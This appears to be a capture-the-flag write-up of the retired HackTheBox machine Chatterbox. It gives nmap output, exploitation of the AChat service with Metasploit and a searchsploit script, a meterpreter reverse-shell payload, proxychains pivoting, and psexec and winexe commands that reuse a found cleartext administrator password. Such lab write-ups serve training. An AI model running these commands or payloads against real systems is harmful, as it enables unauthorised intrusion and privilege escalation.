Chatterbox From Hackthebox
Hello everyone this is Hac , Today we will be doing Chatterbox from hackthebox it’s a retired windows box , So it should be fun solving it .
Nmap scan output :-
└─$ sudo nmap -sC -sV -p- 10.129.108.170 --min-rate 10000 -oA nmap
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-26 02:33 EDT
Warning: 10.129.108.170 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.108.170
Host is up (0.076s latency).
Not shown: 65514 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
2010/tcp filtered search
5826/tcp filtered unknown
9255/tcp open http AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open achat AChat chat system
14496/tcp filtered unknown
17058/tcp filtered unknown
23978/tcp filtered unknown
28255/tcp filtered unknown
34469/tcp filtered unknown
39101/tcp filtered unknown
39782/tcp filtered unknown
45438/tcp filtered unknown
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: 6h20m00s, deviation: 2h18m34s, median: 5h00m00s
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 210:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-10-26T11:35:12
|_ start_date: 2022-10-26T11:30:51
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Chatterbox
| NetBIOS computer name: CHATTERBOX\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-10-26T07:35:09-04:00Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.27 seconds
Heck ton of open port’s , So let’s try to explore from most know port like 445 . So I tried to list smb share but listing was disabled , Now I tried to run enum4linux with the hope of finding something but no luck with that too . Now two port’s looked interesting 9255 & 9256 a service called “achat” was running and there was something with http also , So I tried to access port 9255 in a browser got nothing (no response) , Now I tried to access port 9256 and I got a response saying “error” .
I thought to run gobuster and look for a hidden dir. But It’s always a good idea to look for public exploit’s for “achat”.
Let’s try to exploit the system with two different method’s with and without metasploit .
First we will go with metasploit . You may be wondering why ???? Cuz it’s eazy bro.
Well I got a error “[-] Exploit failed: windows/meterpreter/reverse_tcp: All encoders failed to encode.” I was able to fix it by changing my payload “set payload windows/meterpreter/reverse_tcp_allports” https://github.com/rapid7/metasploit-framework/issues/14130 (U may need to run the exploit multiple time’s to get shell)
Oh boi meterpreter shell was not at all stable shell kept dying .
Now I tried to go with manual method with the hope of getting stable shell .
You can copy the payload to your local machine by using “searchsploit -m windows/remote/36025.py”
We need to modify the script little bit . There is a really good github repo which can help you with that just follow the instruction given by the author of that repo https://github.com/Juggernoobs/achat_reverse_tcp_exploit
Same problem continuous meterpreter kept dying :(
I was able to get stable shell by migrating process . You need to be very quick cuz the shell………
Migrating from 1936 to 692
Got User.txt in “C:\Users\Alfred\Desktop”
Now I uploaded winPEASx86.exe on the box . In order to enumerate the system.
Got a cleartext default password “Welcome1!”. I was wondering how I can use that. Maybe password reuse ?? But where I can use that password ?? . Since we know that there are only two user’s on this box “alfred” & “administrator”. I thought “maybe” administrator use that cred’s to login but the question come’s where the heck I will use that cred . Maybe I can use psexec to get shell but for that we need to port forward .
Doing port forward with metasploit .
- Use this command in meterpreter “run autoroute -s 127.0.0.1” .
2. Now search for “auxiliary/server/socks_proxy”
3. Make sure to change version to “4a” .
4. Now you need to make some changes at “/etc/proxychains4.conf”
Now run a quick nmap scan to make sure your proxy is working .
Now let’s try to list smb shares “proxychains smbclient -L 10.129.138.92 -U alfred -p Welcome1!”.
Now let’s try psexec to get shell as administrator .
python3 ~/impacket/examples/psexec.py administrator:'Welcome1!'@10.129.138.92
Boooooomm We got The shell. There are many non metasploit way to do port forwarding or maybe different way’s to get root on this box , but metasploit way was much easy for me . But from future article’s I will try to do more manual way’s for ex:- We can use plink.exe to do port forwarding .
Sadly we were not able to get the content of root.txt . Let’s try some different method .
proxychains winexe -U Administrator%Welcome1! //127.0.0.1 "cmd.exe"
I hope you like this writeup thanks for reading :)